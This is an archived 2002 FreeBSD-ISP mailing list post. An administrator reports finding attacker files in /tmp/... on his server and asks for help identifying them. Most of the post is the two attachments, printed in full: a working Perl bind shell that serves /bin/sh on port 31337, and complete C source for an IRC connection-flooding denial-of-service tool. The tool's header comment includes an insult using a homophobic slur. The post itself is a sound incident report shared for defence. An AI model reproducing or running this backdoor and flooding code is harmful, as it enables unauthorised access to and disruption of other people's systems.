Date: Wed, 25 Sep 2002 12:03:52 -0400 From: Jan Knepper <jan@digitaldaemon.com> To: FreeBSD ISP <FreeBSD-ISP@FreeBSD.org> Subject: Found... WingateSUX2.c, a.pl (DoS attacker?) Message-ID: <3D91DE68.90206@digitaldaemon.com>
next in thread | raw e-mail | index | archive | help
This is a multi-part message in MIME format.
--------------000104070505000400040000
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi!
I just returned back into the office from a trip to China and found a
directory "..." in /tmp, thus "/tmp/..."
In this directory I found the attached junk.
a.pl was running as a perl script which of course has been killed by now.
Next to that I am filtering access to port 31337 now to see if I can
track where this comes from.
The user and group for the files was for the Apache server.
I figured that someone used an SSL vulnerability to dump some files on
the server and make it a launchpoint for a DoS attack.
Is this correct?
Has anyone else seen this kind of stuff???
Thanks!
Jan
--------------000104070505000400040000
Content-Type: text/plain;
name="a.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="a.pl"
#!/usr/bin/perl
use Socket;
$port = 31337;
socket (S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt (S, SOL_SOCKET, SO_REUSEADDR,1);
bind (S, sockaddr_in ($port, INADDR_ANY));
listen (S, 50);
while (1){
accept (X, S);
if (!($pid = fork)){
if(!defined $pid){exit(0);}
open STDIN,"<&X";
open STDOUT,">&X";
open STDERR,">&X";
exec("/bin/sh -i");
close X;}}
--------------000104070505000400040000
Content-Type: text/plain;
name="WebgateSUX2.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="WebgateSUX2.c"
/* ********** WebgateSUX.c by Himika **********
*
* FOR PRIVATE USE ONLY!!!
*
* This simple program establishes lots of connections
* to a target host and keeps them alive until you make
* it close them. It takes following args:
*
* ./WebgateSUX <server> <number of connections> [port]
*
* where <server> is hostname of the victim;
* <number of connections> is an integer defining how many
* connections do you want to establish to the target;
* [port] as optional numerical parameter specifies port
* to use for establish connections to the host. By default
* it's 6667 for obvious reasons:)
*
* Note: You can't establish as many connections as you want.
* You're restricted to the number of file descriptors your
* OS supports. On Win98 you can create only about 70 connections.
* On most Linux boxes you're limited to 400-500, depending
* on the amount of other running applications.
* Currently, this DoS tools uses only TCP connections.
*
*
* Blames to: abo - You'll be soon dead... fuckin gay.
*
* Greets to: everyone who helps in the war against him.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CONNECTIONS 1000
int main(int argc, char *argv[]) {
int conns, sock[MAX_CONNECTIONS], i, c, port;
struct hostent *host;
struct sockaddr_in server;
if (argc < 3 || argc > 4) {
printf("Usage: %s <server> <# of connections> [port]\n", argv[0]);
exit(1);
}
if ((host = gethostbyname(argv[1])) == 0) {
herror("gethostbyname");
exit(1);
}
conns = atoi(argv[2]);
if (conns > MAX_CONNECTIONS || conns < 0) {
printf("Please select connections number between 0 and 1000.\n");
printf("This version supports up to 1000 simultaneous connections.");
printf("If you desire creating more than 1000, then just edit and fix the source code. Sorry homez, coders should use script-kiddies protections.\n");
exit(1);
}
if (argv[3])
port = atoi(argv[3]);
server.sin_family = AF_INET;
server.sin_addr = *((struct in_addr *)host->h_addr);
if (argv[3])
server.sin_port = htons(port);
else
server.sin_port = htons(6667);
memset(&server.sin_zero, 0, 8);
printf("Attacking %s...\n", argv[1]);
while(1) {
for (i=0;i < conns;i++) {
if ((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
i--;
perror("socket");
continue;
}
if (connect(sock[i], (struct sockaddr *) &server, sizeof(struct sockaddr)) == -1) {
perror("connect");
i--;
continue;
}
}
for (c=i;i >= 0;i--)
send(sock[i], "USER aaa aaa aaa aaa\nNICK aaaaaa\nQUIT\n", 40, 0);
for (;c >= 0;c--)
close(sock[c]);
printf(".");
}
}
--------------000104070505000400040000--
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-isp" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3D91DE68.90206>